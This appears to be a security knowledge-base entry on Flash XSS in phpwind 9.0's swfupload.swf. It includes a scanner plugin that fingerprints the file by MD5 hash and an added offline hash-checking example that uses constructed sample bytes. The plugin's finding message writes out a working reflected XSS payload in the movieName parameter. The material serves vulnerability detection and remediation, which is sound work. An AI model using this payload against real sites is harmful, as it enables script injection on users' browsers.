Flash XSS


This class of XSS arises from the interaction between Flash and JavaScript: a SWF passes attacker-controlled parameters into JavaScript callbacks without sanitising them.

Detection method: verify the hash of the Flash file (e.g. MD5) against the hash of the known-vulnerable build.

Example:

phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf XSS vulnerability

Because Flash files are downloadable by the client, the SWF can simply be fetched and its hash verified. From the vulnerability details, the path of the SWF file is: /res/js/dev/util_libs/swfupload/Flash/swfupload.swf

Sample plugin

PHPWind 9.0 swfupload.swf Flash XSS

Thanks to the plugin author: xyw55

#!/usr/bin/env python
# coding:utf-8
# @Date    : 2015-06-28
# @Author  : xyw55 ([email protected])

'''
phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf XSS vulnerability POC
refer : http://wooyun.org/bugs/wooyun-2013-017731
'''
# hashlib replaces the Python-2-only `md5` module used originally.
import hashlib

# `fingerprint`, `hackhttp` and `security_info` are supplied by the scanner
# framework at runtime (see the `from dummy import *` stub below).


def assign(service, arg):
    # Only run this plugin against targets fingerprinted as phpwind.
    if service == fingerprint.phpwind:
        return True, arg


def audit(arg):
    # MD5 of the known-vulnerable swfupload.swf shipped with phpwind 9.0.
    flash_md5 = "3a1c6cc728dddc258091a601f28a9c12"
    file_path = "/res/js/dev/util_libs/swfupload/Flash/swfupload.swf"
    url = arg
    verify_url = url + file_path

    code, head, res, redirect_url, log = hackhttp.http(verify_url)
    if code == 200:
        md5_value = hashlib.md5(res).hexdigest()
        # Exact comparison; the original substring test (`in`) also matched
        # on partial digests.
        if md5_value == flash_md5:
            # Do not pass `log` into the info message.
            security_info(url + ' phpwind Reflected XSS; payload: /res/js/dev/util_libs/swfupload/Flash/swfupload.swf?movieName="])}catch(e){alert(1)}//')


if __name__ == '__main__':
    from dummy import *
    audit(assign(fingerprint.phpwind, 'http://www.example.com/')[1])
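The hash-verification approach described above, and used by the plugin, as a self-contained added example (it is not part of the original page or the plugin author's code). It works on an already-fetched response body instead of making an HTTP request, so it runs offline. Two practitioner details are added beyond the plugin: the body is first checked for a SWF magic header (`FWS`, `CWS` or `ZWS`), so a server that answers a missing file with a 200 "soft 404" HTML page is not hashed as if it were the Flash file, and the known-vulnerable digests are kept in a table so several builds can be recognised. The phpwind 9.0 digest comes from the page; the `SAMPLE_VULN_SWF` bytes and the `constructed-vulnerable-swf` label are constructed for this example and are not a real SWF.

```python
import hashlib
from typing import Optional

# MD5 of the vulnerable phpwind 9.0 swfupload.swf, as given on the page.
PHPWIND9_SWFUPLOAD_MD5 = "3a1c6cc728dddc258091a601f28a9c12"

# Constructed stand-in for a SWF body (real SWFs start with FWS/CWS/ZWS and a
# version byte); it exists only so the example runs offline.
SAMPLE_VULN_SWF = b"FWS\x09" + b"\x00" * 28 + b"constructed-sample-body"

# Valid SWF magic numbers: uncompressed, zlib-compressed, LZMA-compressed.
SWF_MAGIC = (b"FWS", b"CWS", b"ZWS")


def md5_hex(data: bytes) -> str:
    """Hex MD5 of a byte string; MD5 is used because the published
    fingerprint is an MD5 digest, not because MD5 is a strong hash."""
    return hashlib.md5(data).hexdigest()


# Digest -> description of the vulnerable build it identifies.
KNOWN_VULNERABLE = {
    PHPWIND9_SWFUPLOAD_MD5: "phpwind 9.0 swfupload.swf (Flash XSS via movieName)",
    md5_hex(SAMPLE_VULN_SWF): "constructed-vulnerable-swf",  # constructed entry
}


def is_swf(data: bytes) -> bool:
    """True if the body carries a SWF magic header."""
    return data[:3] in SWF_MAGIC


def fingerprint_swf(data: bytes) -> Optional[str]:
    """Return the description of the vulnerable build matching `data`,
    or None when the body is not a SWF or its digest is unknown."""
    if not is_swf(data):
        return None
    return KNOWN_VULNERABLE.get(md5_hex(data))


def audit_response(url: str, status: int, body: bytes) -> Optional[str]:
    """Mirror of the plugin's audit() step over an already-fetched response:
    only a 200 whose body is a known-vulnerable SWF yields a finding."""
    if status != 200:
        return None
    match = fingerprint_swf(body)
    if match is None:
        return None
    return "%s: known-vulnerable Flash file (%s)" % (url, match)


if __name__ == "__main__":
    # Constructed responses: a soft-404 HTML page, an unknown SWF, and the sample.
    print(audit_response("http://www.example.com/x.swf", 200, b"<html>not found</html>"))
    print(audit_response("http://www.example.com/x.swf", 200, b"CWS\x0a" + b"\x01" * 16))
    print(audit_response("http://www.example.com/x.swf", 200, SAMPLE_VULN_SWF))
```

Because a fixed-digest table only recognises exact copies of a known file, a rebuilt or minified SWF with the same bug will not match; a hash check is a cheap first pass, not proof of absence. Removing or upgrading the bundled swfupload.swf is what actually closes the issue on the server side.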
